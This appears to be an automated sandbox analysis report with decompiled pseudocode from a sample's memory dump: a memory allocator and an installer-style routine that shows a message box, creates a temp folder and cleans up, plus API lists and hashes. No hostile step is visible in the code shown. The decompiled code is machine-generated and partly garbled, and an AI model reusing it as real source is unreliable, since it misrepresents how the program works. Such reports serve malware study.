                                                                                    C-Code - Quality: 68%
                                                                                    			E00403EE8(signed int __eax) {
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* _t96;
				void** _t99;
				signed int _t104;
				signed int _t109;
				signed int _t110;
				intOrPtr* _t114;
				void* _t116;
				void* _t121;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				signed int _t135;
				unsigned int _t141;
				signed int _t142;
				void* _t144;
				void* _t147;
				intOrPtr _t148;
				signed int _t150;
				long _t156;
				intOrPtr _t159;
				signed int _t162;

				_t95 = __eax;
				_t129 =  *0x4bb059; // 0x0
				if(__eax > 0xa2c) {
					__eflags = __eax - 0x40a2c;
					if(__eax > 0x40a2c) {
						_pop(_t120);
						__eflags = __eax;
						if(__eax >= 0) {
							_push(_t120);
							_t162 = __eax;
							_t2 = _t162 + 0x10010; // 0x10110
							_t156 = _t2 - 0x00000001 + 0x00000004 & 0xffff0000;
							_t96 = VirtualAlloc(0, _t156, 0x101000, 4); // executed
							_t121 = _t96;
							if(_t121 != 0) {
								_t147 = _t121;
								 *((intOrPtr*)(_t147 + 8)) = _t162;
								 *(_t147 + 0xc) = _t156 | 0x00000004;
								E00403C48();
								_t99 =  *0x4bdb80; // 0x4bdb7c
								 *_t147 = 0x4bdb7c;
								 *0x4bdb80 = _t121;
								 *(_t147 + 4) = _t99;
								 *_t99 = _t121;
								 *0x4bdb78 = 0;
								_t121 = _t121 + 0x10;
							}
							return _t121;
						} else {
							__eflags = 0;
							return 0;
						}
					} else {
						_t67 = _t95 + 0xd3; // 0x1d3
						_t125 = (_t67 & 0xffffff00) + 0x30;
						__eflags = _t129;
						if(__eflags != 0) {
							while(1) {
								asm("lock cmpxchg [0x4bbae8], ah");
								if(__eflags == 0) {
									goto L42;
								}
								asm("pause");
								__eflags =  *0x4bb989;
								if(__eflags != 0) {
									continue;
								} else {
									Sleep(0);
									asm("lock cmpxchg [0x4bbae8], ah");
									if(__eflags != 0) {
										Sleep(0xa);
										continue;
									}
								}
								goto L42;
							}
						}
						L42:
						_t68 = _t125 - 0xb30; // -2445
						_t141 = _t68;
						_t142 = _t141 >> 0xd;
						_t131 = _t141 >> 8;
						_t104 = 0xffffffff << _t131 &  *(0x4bbaf8 + _t142 * 4);
						__eflags = 0xffffffff;
						if(0xffffffff == 0) {
							_t132 = _t142;
							__eflags = 0xfffffffe << _t132 &  *0x4bbaf4;
							if((0xfffffffe << _t132 &  *0x4bbaf4) == 0) {
								_t133 =  *0x4bbaf0; // 0x0
								_t134 = _t133 - _t125;
								__eflags = _t134;
								if(_t134 < 0) {
									_t109 = E00403BCC(_t125);
								} else {
									_t110 =  *0x4bbaec; // 0x2160900
									_t109 = _t110 - _t125;
									 *0x4bbaec = _t109;
									 *0x4bbaf0 = _t134;
									 *(_t109 - 4) = _t125 | 0x00000002;
								}
								 *0x4bbae8 = 0;
								return _t109;
							} else {
								asm("bsf edx, eax");
								asm("bsf ecx, eax");
								_t135 = _t132 | _t142 << 0x00000005;
								goto L50;
							}
						} else {
							asm("bsf eax, eax");
							_t135 = _t131 & 0xffffffe0 | _t104;
							L50:
							_push(_t152);
							_push(_t145);
							_t148 = 0x4bbb78 + _t135 * 8;
							_t159 =  *((intOrPtr*)(_t148 + 4));
							_t114 =  *((intOrPtr*)(_t159 + 4));
							 *((intOrPtr*)(_t148 + 4)) = _t114;
							 *_t114 = _t148;
							__eflags = _t148 - _t114;
							if(_t148 == _t114) {
								asm("rol eax, cl");
								_t80 = 0x4bbaf8 + _t142 * 4;
								 *_t80 =  *(0x4bbaf8 + _t142 * 4) & 0xfffffffe;
								__eflags =  *_t80;
								if( *_t80 == 0) {
									asm("btr [0x4bbaf4], edx");
								}
							}
							_t150 = 0xfffffff0 &  *(_t159 - 4);
							_t144 = 0xfffffff0 - _t125;
							__eflags = 0xfffffff0;
							if(0xfffffff0 == 0) {
								_t89 =  &((_t159 - 4)[0xfffffffffffffffc]);
								 *_t89 =  *(_t159 - 4 + _t150) & 0x000000f7;
								__eflags =  *_t89;
							} else {
								_t116 = _t125 + _t159;
								 *((intOrPtr*)(_t116 - 4)) = 0xfffffffffffffff3;
								 *(0xfffffff0 + _t116 - 8) = 0xfffffff0;
								__eflags = 0xfffffff0 - 0xb30;
								if(0xfffffff0 >= 0xb30) {
									E00403B00(_t116, 0xfffffffffffffff3, _t144);
								}
							}
							_t93 = _t125 + 2; // 0x1a5
							 *(_t159 - 4) = _t93;
							 *0x4bbae8 = 0;
							return _t159;
						}
					}
				} else {
					__eflags = __cl;
					_t6 = __edx + 0x4bb990; // 0xc8c8c8c8
					__eax =  *_t6 & 0x000000ff;
					__ebx = 0x4b7080 + ( *_t6 & 0x000000ff) * 8;
					if(__eflags != 0) {
						while(1) {
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__eflags == 0) {
								goto L5;
							}
							__ebx = __ebx + 0x20;
							__eflags = __ebx;
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__ebx != 0) {
								__ebx = __ebx + 0x20;
								__eflags = __ebx;
								__eax = 0x100;
								asm("lock cmpxchg [ebx], ah");
								if(__ebx != 0) {
									__ebx = __ebx - 0x40;
									asm("pause");
									__eflags =  *0x4bb989;
									if(__eflags != 0) {
										continue;
									} else {
										Sleep(0);
										__eax = 0x100;
										asm("lock cmpxchg [ebx], ah");
										if(__eflags != 0) {
											Sleep(0xa);
											continue;
										}
									}
								}
							}
							goto L5;
						}
					}
					L5:
					__edx =  *(__ebx + 8);
					__eax =  *(__edx + 0x10);
					__ecx = 0xfffffff8;
					__eflags = __edx - __ebx;
					if(__edx == __ebx) {
						__edx =  *(__ebx + 0x18);
						__ecx =  *(__ebx + 2) & 0x0000ffff;
						__ecx = ( *(__ebx + 2) & 0x0000ffff) + __eax;
						__eflags = __eax -  *(__ebx + 0x14);
						if(__eax >  *(__ebx + 0x14)) {
							_push(__esi);
							_push(__edi);
							__eflags =  *0x4bb059;
							if(__eflags != 0) {
								while(1) {
									__eax = 0x100;
									asm("lock cmpxchg [0x4bbae8], ah");
									if(__eflags == 0) {
										goto L22;
									}
									asm("pause");
									__eflags =  *0x4bb989;
									if(__eflags != 0) {
										continue;
									} else {
										Sleep(0);
										__eax = 0x100;
										asm("lock cmpxchg [0x4bbae8], ah");
										if(__eflags != 0) {
											Sleep(0xa);
											continue;
										}
									}
									goto L22;
								}
							}
							L22:
							 *(__ebx + 1) =  *(__ebx + 1) &  *0x4bbaf4;
							__eflags =  *(__ebx + 1) &  *0x4bbaf4;
							if(( *(__ebx + 1) &  *0x4bbaf4) == 0) {
								__ecx =  *(__ebx + 4) & 0x0000ffff;
								__edi =  *0x4bbaf0; // 0x0
								__eflags = __edi - ( *(__ebx + 4) & 0x0000ffff);
								if(__edi < ( *(__ebx + 4) & 0x0000ffff)) {
									__eax =  *(__ebx + 6) & 0x0000ffff;
									__edi = __eax;
									__eax = E00403BCC(__eax);
									__esi = __eax;
									__eflags = __eax;
									if(__eax != 0) {
										goto L35;
									} else {
										 *0x4bbae8 = __al;
										 *__ebx = __al;
										_pop(__edi);
										_pop(__esi);
										_pop(__ebx);
										return __eax;
									}
								} else {
									__esi =  *0x4bbaec; // 0x2160900
									__ecx =  *(__ebx + 6) & 0x0000ffff;
									__edx = __ecx + 0xb30;
									__eflags = __edi - __ecx + 0xb30;
									if(__edi >= __ecx + 0xb30) {
										__edi = __ecx;
									}
									__esi = __esi - __edi;
									 *0x4bbaf0 =  *0x4bbaf0 - __edi;
									 *0x4bbaec = __esi;
									goto L35;
								}
							} else {
								asm("bsf eax, esi");
								__esi = __eax * 8;
								__ecx =  *(0x4bbaf8 + __eax * 4);
								asm("bsf ecx, ecx");
								__ecx =  *(0x4bbaf8 + __eax * 4) + __eax * 8 * 4;
								__edi = 0x4bbb78 + ( *(0x4bbaf8 + __eax * 4) + __eax * 8 * 4) * 8;
								__esi =  *(__edi + 4);
								__edx =  *(__esi + 4);
								 *(__edi + 4) = __edx;
								 *__edx = __edi;
								__eflags = __edi - __edx;
								if(__edi == __edx) {
									__edx = 0xfffffffe;
									asm("rol edx, cl");
									_t38 = 0x4bbaf8 + __eax * 4;
									 *_t38 =  *(0x4bbaf8 + __eax * 4) & 0xfffffffe;
									__eflags =  *_t38;
									if( *_t38 == 0) {
										asm("btr [0x4bbaf4], eax");
									}
								}
								__edi = 0xfffffff0;
								__edi = 0xfffffff0 &  *(__esi - 4);
								__eflags = 0xfffffff0 - 0x10a60;
								if(0xfffffff0 < 0x10a60) {
									_t52 =  &((__esi - 4)[0xfffffffffffffffc]);
									 *_t52 = (__esi - 4)[0xfffffffffffffffc] & 0x000000f7;
									__eflags =  *_t52;
								} else {
									__edx = __edi;
									__edi =  *(__ebx + 6) & 0x0000ffff;
									__edx = __edx - __edi;
									__eax = __edi + __esi;
									__ecx = __edx + 3;
									 *(__eax - 4) = __ecx;
									 *(__edx + __eax - 8) = __edx;
									__eax = E00403B00(__eax, __ecx, __edx);
								}
								L35:
								_t56 = __edi + 6; // 0x6
								__ecx = _t56;
								 *(__esi - 4) = _t56;
								__eax = 0;
								 *0x4bbae8 = __al;
								 *__esi = __ebx;
								 *((intOrPtr*)(__esi + 0x10)) = 0;
								 *((intOrPtr*)(__esi + 0x14)) = 1;
								 *(__ebx + 0x18) = __esi;
								_t61 = __esi + 0x20; // 0x2160920
								__eax = _t61;
								__ecx =  *(__ebx + 2) & 0x0000ffff;
								__edx = __ecx + __eax;
								 *(__ebx + 0x10) = __ecx + __eax;
								__edi = __edi + __esi;
								__edi = __edi - __ecx;
								__eflags = __edi;
								 *(__ebx + 0x14) = __edi;
								 *__ebx = 0;
								 *(__eax - 4) = __esi;
								_pop(__edi);
								_pop(__esi);
								_pop(__ebx);
								return __eax;
							}
						} else {
							_t19 = __edx + 0x14;
							 *_t19 =  *(__edx + 0x14) + 1;
							__eflags =  *_t19;
							 *(__ebx + 0x10) = __ecx;
							 *__ebx = 0;
							 *(__eax - 4) = __edx;
							_pop(__ebx);
							return __eax;
						}
					} else {
						 *(__edx + 0x14) =  *(__edx + 0x14) + 1;
						__ecx = 0xfffffff8 &  *(__eax - 4);
						__eflags = 0xfffffff8;
						 *(__edx + 0x10) = 0xfffffff8 &  *(__eax - 4);
						 *(__eax - 4) = __edx;
						if(0xfffffff8 == 0) {
							__ecx =  *(__edx + 8);
							 *(__ecx + 0xc) = __ebx;
							 *(__ebx + 8) = __ecx;
							 *__ebx = 0;
							_pop(__ebx);
							return __eax;
						} else {
							 *__ebx = 0;
							_pop(__ebx);
							return __eax;
						}
					}
				}
			}






























                                                                                    0x00403ee8
                                                                                    0x00403ef4
                                                                                    0x00403efa
                                                                                    0x00404148
                                                                                    0x0040414d
                                                                                    0x00404260
                                                                                    0x00404261
                                                                                    0x00404263
                                                                                    0x00403c94
                                                                                    0x00403c98
                                                                                    0x00403c9a
                                                                                    0x00403ca4
                                                                                    0x00403cb4
                                                                                    0x00403cb9
                                                                                    0x00403cbd
                                                                                    0x00403cbf
                                                                                    0x00403cc1
                                                                                    0x00403cc7
                                                                                    0x00403cca
                                                                                    0x00403ccf
                                                                                    0x00403cd4
                                                                                    0x00403cda
                                                                                    0x00403ce0
                                                                                    0x00403ce3
                                                                                    0x00403ce5
                                                                                    0x00403cec
                                                                                    0x00403cec
                                                                                    0x00403cf5
                                                                                    0x00404269
                                                                                    0x00404269
                                                                                    0x0040426b
                                                                                    0x0040426b
                                                                                    0x00404153
                                                                                    0x00404153
                                                                                    0x0040415f
                                                                                    0x00404162
                                                                                    0x00404164
                                                                                    0x0040410c
                                                                                    0x00404111
                                                                                    0x00404119
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040411b
                                                                                    0x0040411d
                                                                                    0x00404124
                                                                                    0x00000000
                                                                                    0x00404126
                                                                                    0x00404128
                                                                                    0x00404132
                                                                                    0x0040413a
                                                                                    0x0040413e
                                                                                    0x00000000
                                                                                    0x0040413e
                                                                                    0x0040413a
                                                                                    0x00000000
                                                                                    0x00404124
                                                                                    0x0040410c
                                                                                    0x00404166
                                                                                    0x00404166
                                                                                    0x00404166
                                                                                    0x0040416e
                                                                                    0x00404171
                                                                                    0x0040417b
                                                                                    0x0040417b
                                                                                    0x00404182
                                                                                    0x00404195
                                                                                    0x00404199
                                                                                    0x0040419f
                                                                                    0x004041b8
                                                                                    0x004041be
                                                                                    0x004041be
                                                                                    0x004041c0
                                                                                    0x004041de
                                                                                    0x004041c2
                                                                                    0x004041c2
                                                                                    0x004041c7
                                                                                    0x004041c9
                                                                                    0x004041ce
                                                                                    0x004041d7
                                                                                    0x004041d7
                                                                                    0x004041e3
                                                                                    0x004041eb
                                                                                    0x004041a1
                                                                                    0x004041a1
                                                                                    0x004041ab
                                                                                    0x004041b3
                                                                                    0x00000000
                                                                                    0x004041b3
                                                                                    0x00404184
                                                                                    0x00404187
                                                                                    0x0040418a
                                                                                    0x004041ec
                                                                                    0x004041ec
                                                                                    0x004041ed
                                                                                    0x004041ee
                                                                                    0x004041f5
                                                                                    0x004041f8
                                                                                    0x004041fb
                                                                                    0x004041fe
                                                                                    0x00404200
                                                                                    0x00404202
                                                                                    0x00404209
                                                                                    0x0040420b
                                                                                    0x0040420b
                                                                                    0x0040420b
                                                                                    0x00404212
                                                                                    0x00404214
                                                                                    0x00404214
                                                                                    0x00404212
                                                                                    0x00404220
                                                                                    0x00404225
                                                                                    0x00404225
                                                                                    0x00404227
                                                                                    0x00404248
                                                                                    0x00404248
                                                                                    0x00404248
                                                                                    0x00404229
                                                                                    0x00404229
                                                                                    0x0040422f
                                                                                    0x00404232
                                                                                    0x00404236
                                                                                    0x0040423c
                                                                                    0x0040423e
                                                                                    0x0040423e
                                                                                    0x0040423c
                                                                                    0x0040424d
                                                                                    0x00404250
                                                                                    0x00404253
                                                                                    0x0040425f
                                                                                    0x0040425f
                                                                                    0x00404182
                                                                                    0x00403f00
                                                                                    0x00403f00
                                                                                    0x00403f02
                                                                                    0x00403f02
                                                                                    0x00403f09
                                                                                    0x00403f10
                                                                                    0x00403f68
                                                                                    0x00403f68
                                                                                    0x00403f6d
                                                                                    0x00403f71
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403f73
                                                                                    0x00403f73
                                                                                    0x00403f76
                                                                                    0x00403f7b
                                                                                    0x00403f7f
                                                                                    0x00403f81
                                                                                    0x00403f81
                                                                                    0x00403f84
                                                                                    0x00403f89
                                                                                    0x00403f8d
                                                                                    0x00403f8f
                                                                                    0x00403f92
                                                                                    0x00403f94
                                                                                    0x00403f9b
                                                                                    0x00000000
                                                                                    0x00403f9d
                                                                                    0x00403f9f
                                                                                    0x00403fa4
                                                                                    0x00403fa9
                                                                                    0x00403fad
                                                                                    0x00403fb5
                                                                                    0x00000000
                                                                                    0x00403fb5
                                                                                    0x00403fad
                                                                                    0x00403f9b
                                                                                    0x00403f8d
                                                                                    0x00000000
                                                                                    0x00403f7f
                                                                                    0x00403f68
                                                                                    0x00403f12
                                                                                    0x00403f12
                                                                                    0x00403f15
                                                                                    0x00403f18
                                                                                    0x00403f1d
                                                                                    0x00403f1f
                                                                                    0x00403f38
                                                                                    0x00403f3b
                                                                                    0x00403f3f
                                                                                    0x00403f41
                                                                                    0x00403f44
                                                                                    0x00403fbc
                                                                                    0x00403fbd
                                                                                    0x00403fbe
                                                                                    0x00403fc5
                                                                                    0x00403fc7
                                                                                    0x00403fc7
                                                                                    0x00403fcc
                                                                                    0x00403fd4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403fd6
                                                                                    0x00403fd8
                                                                                    0x00403fdf
                                                                                    0x00000000
                                                                                    0x00403fe1
                                                                                    0x00403fe3
                                                                                    0x00403fe8
                                                                                    0x00403fed
                                                                                    0x00403ff5
                                                                                    0x00403ff9
                                                                                    0x00000000
                                                                                    0x00403ff9
                                                                                    0x00403ff5
                                                                                    0x00000000
                                                                                    0x00403fdf
                                                                                    0x00403fc7
                                                                                    0x00404000
                                                                                    0x00404004
                                                                                    0x00404004
                                                                                    0x0040400a
                                                                                    0x0040407c
                                                                                    0x00404080
                                                                                    0x00404086
                                                                                    0x00404088
                                                                                    0x004040b0
                                                                                    0x004040b4
                                                                                    0x004040b6
                                                                                    0x004040bb
                                                                                    0x004040bd
                                                                                    0x004040bf
                                                                                    0x00000000
                                                                                    0x004040c1
                                                                                    0x004040c1
                                                                                    0x004040c6
                                                                                    0x004040c8
                                                                                    0x004040c9
                                                                                    0x004040ca
                                                                                    0x004040cb
                                                                                    0x004040cb
                                                                                    0x0040408a
                                                                                    0x0040408a
                                                                                    0x00404090
                                                                                    0x00404094
                                                                                    0x0040409a
                                                                                    0x0040409c
                                                                                    0x0040409e
                                                                                    0x0040409e
                                                                                    0x004040a0
                                                                                    0x004040a2
                                                                                    0x004040a8
                                                                                    0x00000000
                                                                                    0x004040a8
                                                                                    0x0040400c
                                                                                    0x0040400c
                                                                                    0x0040400f
                                                                                    0x00404016
                                                                                    0x0040401d
                                                                                    0x00404020
                                                                                    0x00404023
                                                                                    0x0040402a
                                                                                    0x0040402d
                                                                                    0x00404030
                                                                                    0x00404033
                                                                                    0x00404035
                                                                                    0x00404037
                                                                                    0x00404039
                                                                                    0x0040403e
                                                                                    0x00404040
                                                                                    0x00404040
                                                                                    0x00404040
                                                                                    0x00404047
                                                                                    0x00404049
                                                                                    0x00404049
                                                                                    0x00404047
                                                                                    0x00404050
                                                                                    0x00404055
                                                                                    0x00404058
                                                                                    0x0040405e
                                                                                    0x004040cc
                                                                                    0x004040cc
                                                                                    0x004040cc
                                                                                    0x00404060
                                                                                    0x00404060
                                                                                    0x00404062
                                                                                    0x00404066
                                                                                    0x00404068
                                                                                    0x0040406b
                                                                                    0x0040406e
                                                                                    0x00404071
                                                                                    0x00404075
                                                                                    0x00404075
                                                                                    0x004040d1
                                                                                    0x004040d1
                                                                                    0x004040d1
                                                                                    0x004040d4
                                                                                    0x004040d7
                                                                                    0x004040d9
                                                                                    0x004040de
                                                                                    0x004040e0
                                                                                    0x004040e3
                                                                                    0x004040ea
                                                                                    0x004040ed
                                                                                    0x004040ed
                                                                                    0x004040f0
                                                                                    0x004040f4
                                                                                    0x004040f7
                                                                                    0x004040fa
                                                                                    0x004040fc
                                                                                    0x004040fc
                                                                                    0x004040fe
                                                                                    0x00404101
                                                                                    0x00404104
                                                                                    0x00404107
                                                                                    0x00404108
                                                                                    0x00404109
                                                                                    0x0040410a
                                                                                    0x0040410a
                                                                                    0x00403f46
                                                                                    0x00403f46
                                                                                    0x00403f46
                                                                                    0x00403f46
                                                                                    0x00403f4a
                                                                                    0x00403f4d
                                                                                    0x00403f50
                                                                                    0x00403f53
                                                                                    0x00403f54
                                                                                    0x00403f54
                                                                                    0x00403f21
                                                                                    0x00403f21
                                                                                    0x00403f25
                                                                                    0x00403f25
                                                                                    0x00403f28
                                                                                    0x00403f2b
                                                                                    0x00403f2e
                                                                                    0x00403f58
                                                                                    0x00403f5b
                                                                                    0x00403f5e
                                                                                    0x00403f61
                                                                                    0x00403f64
                                                                                    0x00403f65
                                                                                    0x00403f30
                                                                                    0x00403f30
                                                                                    0x00403f33
                                                                                    0x00403f34
                                                                                    0x00403f34
                                                                                    0x00403f2e
                                                                                    0x00403f1f

                                                                                    APIs
                                                                                    • Sleep.KERNEL32(00000000,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403F9F
                                                                                    • Sleep.KERNEL32(0000000A,00000000,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403FB5
                                                                                    • Sleep.KERNEL32(00000000,00000000,?,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403FE3
                                                                                    • Sleep.KERNEL32(0000000A,00000000,00000000,?,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403FF9
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Sleep
                                                                                    • String ID:
                                                                                    • API String ID: 3472027048-0
                                                                                    • Opcode ID: a5f41a95b234689400651ffc7a7e648ad6c8ae29c578f3c4a4f7439c6b153684
                                                                                    • Instruction ID: d98b69cfe0522def9def3360e9182a2a8bb24ce33fa39324cc86f3a67812f259
                                                                                    • Opcode Fuzzy Hash: a5f41a95b234689400651ffc7a7e648ad6c8ae29c578f3c4a4f7439c6b153684
                                                                                    • Instruction Fuzzy Hash: 99C123B2A002018BCB15CF69EC84356BFE4EB89311F1882BFE514AB3D5D7B89941C7D8
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004B60E8, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 165windowCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 75%
                                                                                    			E004B60E8(void* __ebx, void* __edi, void* __esi, void* __fp0) {
				intOrPtr _t26;
				intOrPtr _t31;
				intOrPtr _t37;
				intOrPtr _t38;
				intOrPtr _t42;
				intOrPtr _t44;
				intOrPtr _t47;
				intOrPtr _t51;
				intOrPtr _t53;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t59;
				intOrPtr _t61;
				WCHAR* _t63;
				intOrPtr _t69;
				intOrPtr _t74;
				int _t75;
				intOrPtr _t76;
				intOrPtr _t78;
				struct HWND__* _t81;
				intOrPtr _t82;
				intOrPtr _t86;
				void* _t90;
				intOrPtr _t93;
				intOrPtr _t99;
				intOrPtr _t101;
				intOrPtr _t107;
				intOrPtr _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				void* _t120;
				intOrPtr _t121;

				_t119 = __esi;
				_t118 = __edi;
				_t85 = __ebx;
				_pop(_t101);
				_pop(_t88);
				 *[fs:eax] = _t101;
				E004AF678(_t88);
				if( *0x4ba440 == 0) {
					if(( *0x4c1d71 & 0x00000001) == 0 &&  *0x4ba441 == 0) {
						_t61 =  *0x4ba674; // 0x4c0d0c
						_t4 = _t61 + 0x2f8; // 0x0
						_t63 = E004084EC( *_t4);
						_t88 = _t120 - 0x28;
						_t101 =  *0x4c1c48; // 0x0
						E00426F08(0xc2, _t120 - 0x28, _t101);
						if(MessageBoxW(0, E004084EC( *((intOrPtr*)(_t120 - 0x28))), _t63, 0x24) != 6) {
							 *0x4ba44c = 2;
							E0041F238();
						}
					}
					E004056D0();
					E004AEFE8(_t120 - 0x2c, _t85, _t101, _t118, _t119); // executed
					E00407E00(0x4c1d94,  *((intOrPtr*)(_t120 - 0x2c)));
					_t26 =  *0x4c1d84; // 0x0
					E00422954(_t26, _t88, _t120 - 0x34);
					E004226C8( *((intOrPtr*)(_t120 - 0x34)), _t85, _t120 - 0x30, L".tmp", _t118, _t119);
					_push( *((intOrPtr*)(_t120 - 0x30)));
					_t31 =  *0x4c1d94; // 0x0
					E00422660(_t31, _t120 - 0x38);
					_pop(_t90);
					E0040873C(0x4c1d98, _t90,  *((intOrPtr*)(_t120 - 0x38)));
					_t107 =  *0x4c1d98; // 0x0
					E00407E00(0x4c1d9c, _t107);
					_t37 =  *0x4c1d90; // 0x4ca924
					_t15 = _t37 + 0x14; // 0x619c58
					_t38 =  *0x4c1d88; // 0x0
					E00423CE8(_t38,  *_t15);
					_push(_t120);
					_push(0x4b63ab);
					_push( *[fs:edx]);
					 *[fs:edx] = _t121;
					 *0x4c1de0 = 0;
					_t42 = E00423D00(1, 0, 1, 0); // executed
					 *0x4c1d8c = _t42;
					_push(_t120);
					_push(0x4b639a);
					_push( *[fs:eax]);
					 *[fs:eax] = _t121;
					_t44 =  *0x4c1d90; // 0x4ca924
					_t16 = _t44 + 0x18; // 0x2dfe00
					 *0x4c1de0 = E004053F0( *_t16);
					_t47 =  *0x4c1d90; // 0x4ca924
					_t17 = _t47 + 0x18; // 0x2dfe00
					_t86 =  *0x4c1de0; // 0x7fbd0010
					E00405884(_t86,  *_t17);
					_push(_t120);
					_push(0x4b62e9);
					_push( *[fs:eax]);
					 *[fs:eax] = _t121;
					_t51 =  *0x424cd8; // 0x424d30
					_t93 =  *0x4c1d88; // 0x0
					_t53 = E00424748(_t93, 1, _t51); // executed
					 *0x4c1de4 = _t53;
					_push(_t120);
					_push(0x4b62d8);
					_push( *[fs:eax]);
					 *[fs:eax] = _t121;
					_t55 =  *0x4c1d90; // 0x4ca924
					_t18 = _t55 + 0x18; // 0x2dfe00
					_t56 =  *0x4c1de4; // 0x2170a30
					E00424A24(_t56,  *_t18, _t86);
					_pop(_t114);
					 *[fs:eax] = _t114;
					_push(E004B62DF);
					_t59 =  *0x4c1de4; // 0x2170a30
					return E00405CE8(_t59);
				} else {
					_t69 =  *0x4ba674; // 0x4c0d0c
					_t1 = _t69 + 0x1d0; // 0x0
					E004AFA44( *_t1, __ebx, __edi, __esi);
					 *0x4ba44c = 0;
					_pop(_t115);
					 *[fs:eax] = _t115;
					_push(E004B6554);
					_t74 =  *0x4c1d88; // 0x0
					_t75 = E00405CE8(_t74);
					if( *0x4c1d9c != 0) {
						_t117 =  *0x4c1d9c; // 0x0
						_t75 = E004AF1B4(0, _t117, 0xfa, 0x32); // executed
					}
					if( *0x4c1d94 != 0) {
						_t82 =  *0x4c1d94; // 0x0
						_t75 = RemoveDirectoryW(E004084EC(_t82)); // executed
					}
					if( *0x4ba450 != 0) {
						_t81 =  *0x4ba450; // 0x9025c
						_t75 = DestroyWindow(_t81); // executed
					}
					if( *0x4c1d78 != 0) {
						_t76 =  *0x4c1d78; // 0x0
						_t99 =  *0x4c1d7c; // 0x1
						_t116 =  *0x426bb0; // 0x426bb4
						E00408D08(_t76, _t99, _t116);
						_t78 =  *0x4c1d78; // 0x0
						E0040540C(_t78);
						 *0x4c1d78 = 0;
						return 0;
					}
					return _t75;
				}
			}




































                                                                                    0x004b60e8
                                                                                    0x004b60e8
                                                                                    0x004b60e8
                                                                                    0x004b60ea
                                                                                    0x004b60ec
                                                                                    0x004b60ed
                                                                                    0x004b610d
                                                                                    0x004b6119
                                                                                    0x004b613e
                                                                                    0x004b614b
                                                                                    0x004b6150
                                                                                    0x004b6156
                                                                                    0x004b615c
                                                                                    0x004b615f
                                                                                    0x004b6169
                                                                                    0x004b6181
                                                                                    0x004b6183
                                                                                    0x004b618d
                                                                                    0x004b618d
                                                                                    0x004b6181
                                                                                    0x004b6192
                                                                                    0x004b619a
                                                                                    0x004b61a7
                                                                                    0x004b61af
                                                                                    0x004b61b4
                                                                                    0x004b61c4
                                                                                    0x004b61cc
                                                                                    0x004b61d0
                                                                                    0x004b61d5
                                                                                    0x004b61e2
                                                                                    0x004b61e3
                                                                                    0x004b61ed
                                                                                    0x004b61f3
                                                                                    0x004b61f8
                                                                                    0x004b61fd
                                                                                    0x004b6200
                                                                                    0x004b6205
                                                                                    0x004b620c
                                                                                    0x004b620d
                                                                                    0x004b6212
                                                                                    0x004b6215
                                                                                    0x004b621a
                                                                                    0x004b6232
                                                                                    0x004b6237
                                                                                    0x004b623e
                                                                                    0x004b623f
                                                                                    0x004b6244
                                                                                    0x004b6247
                                                                                    0x004b624a
                                                                                    0x004b624f
                                                                                    0x004b6257
                                                                                    0x004b625c
                                                                                    0x004b6261
                                                                                    0x004b6264
                                                                                    0x004b626e
                                                                                    0x004b6275
                                                                                    0x004b6276
                                                                                    0x004b627b
                                                                                    0x004b627e
                                                                                    0x004b6281
                                                                                    0x004b6287
                                                                                    0x004b6294
                                                                                    0x004b6299
                                                                                    0x004b62a0
                                                                                    0x004b62a1
                                                                                    0x004b62a6
                                                                                    0x004b62a9
                                                                                    0x004b62ac
                                                                                    0x004b62b1
                                                                                    0x004b62b6
                                                                                    0x004b62bb
                                                                                    0x004b62c2
                                                                                    0x004b62c5
                                                                                    0x004b62c8
                                                                                    0x004b62cd
                                                                                    0x004b62d7
                                                                                    0x004b611b
                                                                                    0x004b611b
                                                                                    0x004b6120
                                                                                    0x004b6126
                                                                                    0x004b612d
                                                                                    0x004b64b5
                                                                                    0x004b64b8
                                                                                    0x004b64bb
                                                                                    0x004b64c0
                                                                                    0x004b64c5
                                                                                    0x004b64d1
                                                                                    0x004b64df
                                                                                    0x004b64e7
                                                                                    0x004b64e7
                                                                                    0x004b64f3
                                                                                    0x004b64f5
                                                                                    0x004b6500
                                                                                    0x004b6500
                                                                                    0x004b650c
                                                                                    0x004b650e
                                                                                    0x004b6514
                                                                                    0x004b6514
                                                                                    0x004b6520
                                                                                    0x004b6522
                                                                                    0x004b6527
                                                                                    0x004b652d
                                                                                    0x004b6533
                                                                                    0x004b6538
                                                                                    0x004b653d
                                                                                    0x004b6544
                                                                                    0x00000000
                                                                                    0x004b6544
                                                                                    0x004b6549
                                                                                    0x004b6549

                                                                                    APIs
                                                                                    • MessageBoxW.USER32(00000000,00000000,00000000,00000024), ref: 004B6179
                                                                                      • Part of subcall function 004AFA44: MessageBoxW.USER32(00000000,00000000,Setup,00000010), ref: 004AFAAE
